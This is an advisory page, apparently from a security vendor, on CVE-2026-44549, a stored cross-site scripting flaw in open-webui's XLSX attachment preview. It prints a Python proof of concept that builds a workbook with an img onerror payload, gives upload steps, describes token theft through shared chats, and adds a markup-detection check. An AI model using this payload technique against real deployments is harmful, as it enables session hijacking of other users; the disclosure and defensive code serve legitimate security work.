CVE-2026-44549

CVE-2026-44549 is a high-severity cross-site scripting (XSS) vulnerability in open-webui (pip), affecting versions <= 0.7.2. It is fixed in 0.8.0.

Summary

Excel file attachments are previewed in an unsafe way. A crafted XLSX file can cause the SheetJS function sheet_to_html to embed an XSS payload in the generated HTML. That HTML is then inserted into the DOM unsanitised via @html, so the payload executes.

Details

The function used to convert XLSX documents to HTML for preview performs no input validation or sanitisation of the generated HTML:
https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L120-L133
XLSX attachments are processed by this function and converted to HTML with XLSX.utils.sheet_to_html, and the result is assigned to the variable excelHtml. Later, when the preview tab is selected, that value is assigned directly to the DOM:
https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L358-L400

PoC

A python script to generate a payload file is as follows:

import xlsxwriter

# Cell text carrying an HTML tag; this is what ends up in the preview HTML.
payload = '<img src=x onerror="alert(\'XSS Triggered by XLSX file\')">'

workbook = xlsxwriter.Workbook('xss_payload.xlsx')
worksheet = workbook.add_worksheet()

payload_format = workbook.add_format()

# Write A1 as a rich string: a plain prefix followed by a formatted fragment.
worksheet.write_rich_string('A1',
    'This cell contains a hidden payload: ',
    payload_format, payload
)

worksheet.write('A2', 'This is a safe cell.')
worksheet.write('B1', 'Column B')

workbook.close()

Upload the generated file as an attachment to a chat, open the file modal, and click preview. Observe that the payload executes.

This same process can be triggered in shared chats, allowing the payload to be distributed to victims.
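An added defensive check, not part of the advisory or of open-webui: it unpacks an XLSX's xl/sharedStrings.xml and flags any cell string (including rich-text strings split into runs, the shape the PoC above produces) that contains an HTML tag or a javascript: URL, so such uploads can be logged or rejected before any preview is generated. build_sample_xlsx is a hypothetical helper that constructs a minimal sharedStrings-only workbook in memory for the demo.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

SS_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"

# An HTML tag, or a javascript: URL, anywhere in a cell's text.
MARKUP_RE = re.compile(r"</?[a-zA-Z][^>]*>|javascript\s*:", re.IGNORECASE)


def _xml_escape(s):
    return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")


def build_sample_xlsx(cells):
    """Constructed sample, not a real workbook: only xl/sharedStrings.xml is
    packed, which is all the check below reads. A str is a plain cell; a tuple
    of str is a rich-text cell split into <r> runs, the shape that the PoC's
    write_rich_string() call produces."""
    items = []
    for cell in cells:
        runs = cell if isinstance(cell, tuple) else (cell,)
        items.append("<si>" + "".join(
            f'<r><t xml:space="preserve">{_xml_escape(r)}</t></r>' for r in runs
        ) + "</si>")
    xml = (f'<sst xmlns="{SS_NS}" count="{len(cells)}" uniqueCount="{len(cells)}">'
           + "".join(items) + "</sst>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", xml)
    return buf.getvalue()


def find_markup_strings(xlsx_bytes):
    """Return every shared string in the workbook that contains markup."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        if "xl/sharedStrings.xml" not in zf.namelist():
            return []  # workbook has no shared strings, so nothing to flag
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    flagged = []
    for si in root.iter(f"{{{SS_NS}}}si"):
        # Join the <t> runs so a tag split across rich-text runs is still seen.
        text = "".join(t.text or "" for t in si.iter(f"{{{SS_NS}}}t"))
        if MARKUP_RE.search(text):
            flagged.append(text)
    return flagged
```

Only shared strings are inspected; inline strings (cells with t="inlineStr") in the sheet XML would need the same treatment. This is a defence-in-depth signal for upload handling, not a substitute for sanitising the rendered HTML before it reaches the DOM.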

Caveats

The file attachment in the shared chat must be opened and previewed to trigger the vulnerability.

Impact

Any user can create a weaponised chat that can be shared and subsequently used to target other users.

Low privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server.

Admins are at risk of exposing the server to RCE via the same chain described in GHSA-w7xj-8fx7-wfch.

Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

CVE-2026-44549 has a CVSS score of 7.3 (High). The vector is network-reachable, low privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.8.0); upgrading removes the vulnerable code path.

Affected versions

open-webui (<= 0.7.2)

Security releases

open-webui → 0.8.0 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Sanitise the generated HTML with DOMPurify before assigning it to the DOM.

Frequently Asked Questions

  1. What is CVE-2026-44549? CVE-2026-44549 is a high-severity cross-site scripting (XSS) vulnerability in open-webui (pip), affecting versions <= 0.7.2. It is fixed in 0.8.0. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. How severe is CVE-2026-44549? CVE-2026-44549 has a CVSS score of 7.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of open-webui are affected by CVE-2026-44549? open-webui (pip) versions <= 0.7.2 are affected.
  4. Is there a fix for CVE-2026-44549? Yes. CVE-2026-44549 is fixed in 0.8.0. Upgrade to this version or later.
  5. Is CVE-2026-44549 exploitable, and should I be worried? Whether CVE-2026-44549 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2026-44549 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-44549? Upgrade open-webui to 0.8.0 or later.

